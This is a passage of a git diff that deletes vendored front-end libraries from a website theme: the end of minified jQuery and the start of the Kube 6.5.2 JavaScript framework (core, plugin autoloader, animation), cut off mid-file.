d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!n.isXMLDoc(a),f&&(b=n.propFix[b]||b,e=n.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){return a.hasAttribute("tabindex")||_a.test(a.nodeName)||a.href?a.tabIndex:-1}}}}),k.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this});var ab=/[\t\r\n\f]/g;n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h="string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ab," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=n.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0===arguments.length||"string"==typeof a&&a,i=0,j=this.length;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,this.className))});if(h)for(b=(a||"").match(E)||[];j>i;i++)if(c=this[i],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(ab," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?n.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(n.isFunction(a)?function(c){n(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=n(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===U||"boolean"===c)&&(this.className&&L.set(this,"__className__",this.className),this.className=this.className||a===!1?"":L.get(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(ab," ").indexOf(b)>=0)return!0;return!1}});var bb=/\r/g;n.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=n.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,n(this).val()):a,null==e?e="":"number"==typeof e?e+="":n.isArray(e)&&(e=n.map(e,function(a){return null==a?"":a+""})),b=n.valHooks[this.type]||n.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=n.valHooks[e.type]||n.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(bb,""):null==c?"":c)}}}),n.extend({valHooks:{option:{get:function(a){var b=n.find.attr(a,"value");return null!=b?b:n.trim(n.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&n.nodeName(c.parentNode,"optgroup"))){if(b=n(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=n.makeArray(b),g=e.length;while(g--)d=e[g],(d.selected=n.inArray(d.value,f)>=0)&&(c=!0);return c||(a.selectedIndex=-1),f}}}}),n.each(["radio","checkbox"],function(){n.valHooks[this]={set:function(a,b){return n.isArray(b)?a.checked=n.inArray(n(a).val(),b)>=0:void 0}},k.checkOn||(n.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})}),n.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){n.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),n.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var cb=n.now(),db=/\?/;n.parseJSON=function(a){return JSON.parse(a+"")},n.parseXML=function(a){var b,c;if(!a||"string"!=typeof a)return null;try{c=new DOMParser,b=c.parseFromString(a,"text/xml")}catch(d){b=void 0}return(!b||b.getElementsByTagName("parsererror").length)&&n.error("Invalid XML: "+a),b};var eb=/#.*$/,fb=/([?&])_=[^&]*/,gb=/^(.*?):[ \t]*([^\r\n]*)$/gm,hb=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,ib=/^(?:GET|HEAD)$/,jb=/^\/\//,kb=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,lb={},mb={},nb="*/".concat("*"),ob=a.location.href,pb=kb.exec(ob.toLowerCase())||[];function qb(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(n.isFunction(c))while(d=f[e++])"+"===d[0]?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function rb(a,b,c,d){var e={},f=a===mb;function g(h){var i;return e[h]=!0,n.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function sb(a,b){var c,d,e=n.ajaxSettings.flatOptions||{};for(c in b)void 0!==b[c]&&((e[c]?a:d||(d={}))[c]=b[c]);return d&&n.extend(!0,a,d),a}function tb(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===d&&(d=a.mimeType||b.getResponseHeader("Content-Type"));if(d)for(e in h)if(h[e]&&h[e].test(d)){i.unshift(e);break}if(i[0]in c)f=i[0];else{for(e in c){if(!i[0]||a.converters[e+" "+i[0]]){f=e;break}g||(g=e)}f=f||g}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function ub(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}n.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:ob,type:"GET",isLocal:hb.test(pb[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":nb,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":n.parseJSON,"text xml":n.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?sb(sb(a,n.ajaxSettings),b):sb(n.ajaxSettings,a)},ajaxPrefilter:qb(lb),ajaxTransport:qb(mb),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=n.ajaxSetup({},b),l=k.context||k,m=k.context&&(l.nodeType||l.jquery)?n(l):n.event,o=n.Deferred(),p=n.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!f){f={};while(b=gb.exec(e))f[b[1].toLowerCase()]=b[2]}b=f[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?e:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return c&&c.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||ob)+"").replace(eb,"").replace(jb,pb[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=n.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(h=kb.exec(k.url.toLowerCase()),k.crossDomain=!(!h||h[1]===pb[1]&&h[2]===pb[2]&&(h[3]||("http:"===h[1]?"80":"443"))===(pb[3]||("http:"===pb[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=n.param(k.data,k.traditional)),rb(lb,k,b,v),2===t)return v;i=n.event&&k.global,i&&0===n.active++&&n.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!ib.test(k.type),d=k.url,k.hasContent||(k.data&&(d=k.url+=(db.test(d)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=fb.test(d)?d.replace(fb,"$1_="+cb++):d+(db.test(d)?"&":"?")+"_="+cb++)),k.ifModified&&(n.lastModified[d]&&v.setRequestHeader("If-Modified-Since",n.lastModified[d]),n.etag[d]&&v.setRequestHeader("If-None-Match",n.etag[d])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+nb+"; q=0.01":""):k.accepts["*"]);for(j in k.headers)v.setRequestHeader(j,k.headers[j]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(j in{success:1,error:1,complete:1})v[j](k[j]);if(c=rb(mb,k,b,v)){v.readyState=1,i&&m.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,c.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,f,h){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),c=void 0,e=h||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,f&&(u=tb(k,v,f)),u=ub(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(n.lastModified[d]=w),w=v.getResponseHeader("etag"),w&&(n.etag[d]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,i&&m.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),i&&(m.trigger("ajaxComplete",[v,k]),--n.active||n.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return n.get(a,b,c,"json")},getScript:function(a,b){return n.get(a,void 0,b,"script")}}),n.each(["get","post"],function(a,b){n[b]=function(a,c,d,e){return n.isFunction(c)&&(e=e||d,d=c,c=void 0),n.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),n._evalUrl=function(a){return n.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},n.fn.extend({wrapAll:function(a){var b;return n.isFunction(a)?this.each(function(b){n(this).wrapAll(a.call(this,b))}):(this[0]&&(b=n(a,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstElementChild)a=a.firstElementChild;return a}).append(this)),this)},wrapInner:function(a){return this.each(n.isFunction(a)?function(b){n(this).wrapInner(a.call(this,b))}:function(){var b=n(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=n.isFunction(a);return this.each(function(c){n(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){n.nodeName(this,"body")||n(this).replaceWith(this.childNodes)}).end()}}),n.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0},n.expr.filters.visible=function(a){return!n.expr.filters.hidden(a)};var vb=/%20/g,wb=/\[\]$/,xb=/\r?\n/g,yb=/^(?:submit|button|image|reset|file)$/i,zb=/^(?:input|select|textarea|keygen)/i;function Ab(a,b,c,d){var e;if(n.isArray(b))n.each(b,function(b,e){c||wb.test(a)?d(a,e):Ab(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==n.type(b))d(a,b);else for(e in b)Ab(a+"["+e+"]",b[e],c,d)}n.param=function(a,b){var c,d=[],e=function(a,b){b=n.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=n.ajaxSettings&&n.ajaxSettings.traditional),n.isArray(a)||a.jquery&&!n.isPlainObject(a))n.each(a,function(){e(this.name,this.value)});else for(c in a)Ab(c,a[c],b,e);return d.join("&").replace(vb,"+")},n.fn.extend({serialize:function(){return n.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=n.prop(this,"elements");return a?n.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!n(this).is(":disabled")&&zb.test(this.nodeName)&&!yb.test(a)&&(this.checked||!T.test(a))}).map(function(a,b){var c=n(this).val();return null==c?null:n.isArray(c)?n.map(c,function(a){return{name:b.name,value:a.replace(xb,"\r\n")}}):{name:b.name,value:c.replace(xb,"\r\n")}}).get()}}),n.ajaxSettings.xhr=function(){try{return new XMLHttpRequest}catch(a){}};var Bb=0,Cb={},Db={0:200,1223:204},Eb=n.ajaxSettings.xhr();a.attachEvent&&a.attachEvent("onunload",function(){for(var a in Cb)Cb[a]()}),k.cors=!!Eb&&"withCredentials"in Eb,k.ajax=Eb=!!Eb,n.ajaxTransport(function(a){var b;return k.cors||Eb&&!a.crossDomain?{send:function(c,d){var e,f=a.xhr(),g=++Bb;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)f.setRequestHeader(e,c[e]);b=function(a){return function(){b&&(delete Cb[g],b=f.onload=f.onerror=null,"abort"===a?f.abort():"error"===a?d(f.status,f.statusText):d(Db[f.status]||f.status,f.statusText,"string"==typeof f.responseText?{text:f.responseText}:void 0,f.getAllResponseHeaders()))}},f.onload=b(),f.onerror=b("error"),b=Cb[g]=b("abort");try{f.send(a.hasContent&&a.data||null)}catch(h){if(b)throw h}},abort:function(){b&&b()}}:void 0}),n.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return n.globalEval(a),a}}}),n.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET")}),n.ajaxTransport("script",function(a){if(a.crossDomain){var b,c;return{send:function(d,e){b=n("<script>").prop({async:!0,charset:a.scriptCharset,src:a.url}).on("load error",c=function(a){b.remove(),c=null,a&&e("error"===a.type?404:200,a.type)}),l.head.appendChild(b[0])},abort:function(){c&&c()}}}});var Fb=[],Gb=/(=)\?(?=&|$)|\?\?/;n.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=Fb.pop()||n.expando+"_"+cb++;return this[a]=!0,a}}),n.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(Gb.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Gb.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=n.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(Gb,"$1"+e):b.jsonp!==!1&&(b.url+=(db.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||n.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,Fb.push(e)),g&&n.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),n.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||l;var d=v.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=n.buildFragment([a],b,e),e&&e.length&&n(e).remove(),n.merge([],d.childNodes))};var Hb=n.fn.load;n.fn.load=function(a,b,c){if("string"!=typeof a&&Hb)return Hb.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=n.trim(a.slice(h)),a=a.slice(0,h)),n.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(e="POST"),g.length>0&&n.ajax({url:a,type:e,dataType:"html",data:b}).done(function(a){f=arguments,g.html(d?n("<div>").append(n.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,f||[a.responseText,b,a])}),this},n.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){n.fn[b]=function(a){return this.on(b,a)}}),n.expr.filters.animated=function(a){return n.grep(n.timers,function(b){return a===b.elem}).length};var Ib=a.document.documentElement;function Jb(a){return n.isWindow(a)?a:9===a.nodeType&&a.defaultView}n.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=n.css(a,"position"),l=n(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=n.css(a,"top"),i=n.css(a,"left"),j=("absolute"===k||"fixed"===k)&&(f+i).indexOf("auto")>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),n.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},n.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){n.offset.setOffset(this,a,b)});var b,c,d=this[0],e={top:0,left:0},f=d&&d.ownerDocument;if(f)return b=f.documentElement,n.contains(b,d)?(typeof d.getBoundingClientRect!==U&&(e=d.getBoundingClientRect()),c=Jb(f),{top:e.top+c.pageYOffset-b.clientTop,left:e.left+c.pageXOffset-b.clientLeft}):e},position:function(){if(this[0]){var a,b,c=this[0],d={top:0,left:0};return"fixed"===n.css(c,"position")?b=c.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),n.nodeName(a[0],"html")||(d=a.offset()),d.top+=n.css(a[0],"borderTopWidth",!0),d.left+=n.css(a[0],"borderLeftWidth",!0)),{top:b.top-d.top-n.css(c,"marginTop",!0),left:b.left-d.left-n.css(c,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||Ib;while(a&&!n.nodeName(a,"html")&&"static"===n.css(a,"position"))a=a.offsetParent;return a||Ib})}}),n.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(b,c){var d="pageYOffset"===c;n.fn[b]=function(e){return J(this,function(b,e,f){var g=Jb(b);return void 0===f?g?g[c]:b[e]:void(g?g.scrollTo(d?a.pageXOffset:f,d?f:a.pageYOffset):b[e]=f)},b,e,arguments.length,null)}}),n.each(["top","left"],function(a,b){n.cssHooks[b]=ya(k.pixelPosition,function(a,c){return c?(c=xa(a,b),va.test(c)?n(a).position()[b]+"px":c):void 0})}),n.each({Height:"height",Width:"width"},function(a,b){n.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){n.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return J(this,function(b,c,d){var e;return n.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var Kb=a.jQuery,Lb=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=Lb),b&&a.jQuery===n&&(a.jQuery=Kb),n},typeof b===U&&(a.jQuery=a.$=n),n});
-//# sourceMappingURL=jquery.min.map
\ No newline at end of file
diff --git a/website/src/themes/kube/static/js/kube.js b/website/src/themes/kube/static/js/kube.js
deleted file mode 100644
index 1367898ffa..0000000000
--- a/website/src/themes/kube/static/js/kube.js
+++ /dev/null
@@ -1,2201 +0,0 @@
-/*
-	Kube. CSS & JS Framework
-	Version 6.5.2
-	Updated: February 2, 2017
-
-	http://imperavi.com/kube/
-
-	Copyright (c) 2009-2017, Imperavi LLC.
-	License: MIT
-*/
-if (typeof jQuery === 'undefined') {throw new Error('Kube\'s requires jQuery')};
-;(function($) { var version = $.fn.jquery.split('.'); if (version[0] == 1 && version[1] < 8) {throw new Error('Kube\'s requires at least jQuery v1.8'); }})(jQuery);
-
-;(function()
-{
-    // Inherits
-    Function.prototype.inherits = function(parent)
-    {
-        var F = function () {};
-        F.prototype = parent.prototype;
-        var f = new F();
-
-        for (var prop in this.prototype) f[prop] = this.prototype[prop];
-        this.prototype = f;
-        this.prototype.super = parent.prototype;
-    };
-
-    // Core Class
-    var Kube = function(element, options)
-    {
-        options = (typeof options === 'object') ? options : {};
-
-        this.$element = $(element);
-        this.opts     = $.extend(true, this.defaults, $.fn[this.namespace].options, this.$element.data(), options);
-        this.$target  = (typeof this.opts.target === 'string') ? $(this.opts.target) : null;
-    };
-
-    // Core Functionality
-    Kube.prototype = {
-        getInstance: function()
-        {
-            return this.$element.data('fn.' + this.namespace);
-        },
-        hasTarget: function()
-        {
-           return !(this.$target === null);
-        },
-        callback: function(type)
-        {
-    		var args = [].slice.call(arguments).splice(1);
-
-            // on element callback
-            if (this.$element)
-            {
-                args = this._fireCallback($._data(this.$element[0], 'events'), type, this.namespace, args);
-            }
-
-            // on target callback
-            if (this.$target)
-            {
-                args = this._fireCallback($._data(this.$target[0], 'events'), type, this.namespace, args);
-    		}
-
-    		// opts callback
-    		if (this.opts && this.opts.callbacks && $.isFunction(this.opts.callbacks[type]))
-    		{
-                return this.opts.callbacks[type].apply(this, args);
-    		}
-
-    		return args;
-        },
-        _fireCallback: function(events, type, eventNamespace, args)
-        {
-            if (events && typeof events[type] !== 'undefined')
-            {
-    			var len = events[type].length;
-    			for (var i = 0; i < len; i++)
-    			{
-    				var namespace = events[type][i].namespace;
-    				if (namespace === eventNamespace)
-    				{
-    					var value = events[type][i].handler.apply(this, args);
-    				}
-    			}
-    		}
-
-            return (typeof value === 'undefined') ? args : value;
-        }
-    };
-
-    // Scope
-    window.Kube = Kube;
-
-})();
-/**
- * @library Kube Plugin
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Plugin = {
-        create: function(classname, pluginname)
-        {
-            pluginname = (typeof pluginname === 'undefined') ? classname.toLowerCase() : pluginname;
-
-            $.fn[pluginname] = function(method, options)
-            {
-                var args = Array.prototype.slice.call(arguments, 1);
-                var name = 'fn.' + pluginname;
-                var val = [];
-
-                this.each(function()
-                {
-                    var $this = $(this), data = $this.data(name);
-                    options = (typeof method === 'object') ? method : options;
-
-                    if (!data)
-                    {
-                        // Initialization
-                        $this.data(name, {});
-                        $this.data(name, (data = new Kube[classname](this, options)));
-                    }
-
-                    // Call methods
-                    if (typeof method === 'string')
-                    {
-                        if ($.isFunction(data[method]))
-                        {
-                            var methodVal = data[method].apply(data, args);
-                            if (methodVal !== undefined)
-                            {
-                                val.push(methodVal);
-                            }
-                        }
-                        else
-                        {
-                            $.error('No such method "' + method + '" for ' + classname);
-                        }
-                    }
-
-                });
-
-                return (val.length === 0 || val.length === 1) ? ((val.length === 0) ? this : val[0]) : val;
-            };
-
-            $.fn[pluginname].options = {};
-
-            return this;
-        },
-        autoload: function(pluginname)
-        {
-            var arr = pluginname.split(',');
-            var len = arr.length;
-
-            for (var i = 0; i < len; i++)
-            {
-                var name = arr[i].toLowerCase().split(',').map(function(s) { return s.trim() }).join(',');
-                this.autoloadQueue.push(name);
-            }
-
-            return this;
-        },
-        autoloadQueue: [],
-        startAutoload: function()
-        {
-            if (!window.MutationObserver || this.autoloadQueue.length === 0)
-            {
-                return;
-            }
-
-            var self = this;
-    		var observer = new MutationObserver(function(mutations)
-    		{
-    			mutations.forEach(function(mutation)
-    			{
-    				var newNodes = mutation.addedNodes;
-    			    if (newNodes.length === 0 || (newNodes.length === 1 && newNodes.nodeType === 3))
-    			    {
-    				    return;
-    				}
-
-                    self.startAutoloadOnce();
-    			});
-    		});
-
-    		// pass in the target node, as well as the observer options
-    		observer.observe(document, {
-    			 subtree: true,
-    			 childList: true
-    		});
-        },
-        startAutoloadOnce: function()
-        {
-            var self = this;
-            var $nodes = $('[data-component]').not('[data-loaded]');
-    		$nodes.each(function()
-    		{
-        		var $el = $(this);
-        		var pluginname = $el.data('component');
-
-                if (self.autoloadQueue.indexOf(pluginname) !== -1)
-                {
-            		$el.attr('data-loaded', true);
-                    $el[pluginname]();
-                }
-            });
-
-        },
-        watch: function()
-        {
-            Kube.Plugin.startAutoloadOnce();
-            Kube.Plugin.startAutoload();
-        }
-    };
-
-    $(window).on('load', function()
-    {
-        Kube.Plugin.watch();
-    });
-
-}(Kube));
-/**
- * @library Kube Animation
- * @author Imperavi LLC
- * @license MIT
- */
-(function(Kube)
-{
-    Kube.Animation = function(element, effect, callback)
-    {
-        this.namespace = 'animation';
-        this.defaults = {};
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Initialization
-        this.effect = effect;
-        this.completeCallback = (typeof callback === 'undefined') ? false : callback;
-        this.prefixes = ['', '-moz-', '-o-animation-', '-webkit-'];
-        this.queue = [];
-
-        this.start();
-    };
-
-    Kube.Animation.prototype = {
-        start: function()
-        {
-	    	if (this.isSlideEffect()) this.setElementHeight();
-
-			this.addToQueue();
-			this.clean();
-			this.animate();
-        },
-        addToQueue: function()
-        {
-            this.queue.push(this.effect);
-        },
-        setElementHeight: function()
-        {
-            this.$element.height(this.$element.height());
-        },
-        removeElementHeight: function()
-        {
-            this.$element.css('height', '');
-        },
-        isSlideEffect: function()
-        {
-            return (this.effect === 'slideDown' || this.effect === 'slideUp');
-        },
-        isHideableEffect: function()
-        {
-            var effects = ['fadeOut', 'slideUp', 'flipOut', 'zoomOut', 'slideOutUp', 'slideOutRight', 'slideOutLeft'];
-
-			return ($.inArray(this.effect, effects) !== -1);
-        },
-        isToggleEffect: function()
-        {
-            return (this.effect === 'show' || this.effect === 'hide');
-        },
-        storeHideClasses: function()
-        {
-            if (this.$element.hasClass('hide-sm'))      this.$element.data('hide-sm-class', true);
-            else if (this.$element.hasClass('hide-md')) this.$element.data('hide-md-class', true);
-        },
-        revertHideClasses: function()
-        {
-            if (this.$element.data('hide-sm-class'))      this.$element.addClass('hide-sm').removeData('hide-sm-class');
-            else if (this.$element.data('hide-md-class')) this.$element.addClass('hide-md').removeData('hide-md-class');
-            else                                          this.$element.addClass('hide');
-        },
-        removeHideClass: function()
-        {
-            if (this.$element.data('hide-sm-class'))      this.$element.removeClass('hide-sm');
-            else if (this.$element.data('hide-md-class')) this.$element.removeClass('hide-md');
-            else                                          this.$element.removeClass('hide');
-        },
-        animate: function()
-        {
-            this.storeHideClasses();
-            if (this.isToggleEffect())
-			{
-				return this.makeSimpleEffects();
-            }
-
-            this.$element.addClass('kubeanimated');
-			this.$element.addClass(this.queue[0]);
-            this.removeHideClass();
-
-			var _callback = (this.queue.length > 1) ? null : this.completeCallback;
-			this.complete('AnimationEnd', $.proxy(this.makeComplete, this), _callback);
-        },
-        makeSimpleEffects: function()
-        {
-           	if      (this.effect === 'show') this.removeHideClass();
-            else if (this.effect === 'hide') this.revertHideClasses();
-
-            if (typeof this.completeCallback === 'function') this.completeCallback(this);
-        },
-		makeComplete: function()
-		{
-            if (this.$element.hasClass(this.queue[0]))
-            {
-				this.clean();
-				this.queue.shift();
-
-				if (this.queue.length) this.animate();
-			}
-		},
-        complete: function(type, make, callback)
-		{
-    		var event = type.toLowerCase() + ' webkit' + type + ' o' + type + ' MS' + type;
-
-			this.$element.one(event, $.proxy(function()
-			{
-				if (typeof make === 'function')     make();
-				if (this.isHideableEffect())        this.revertHideClasses();
-				if (this.isSlideEffect())           this.removeElementHeight();
-				if (typeof callback === 'function') callback(this);
-
-				this.$element.off(event);
-
-			}, this));
-		},
-		clean: function()
-		{
-			this.$element.removeClass('kubeanimated').removeClass(this.queue[0]);
-		}
-    };
-
-    // Inheritance
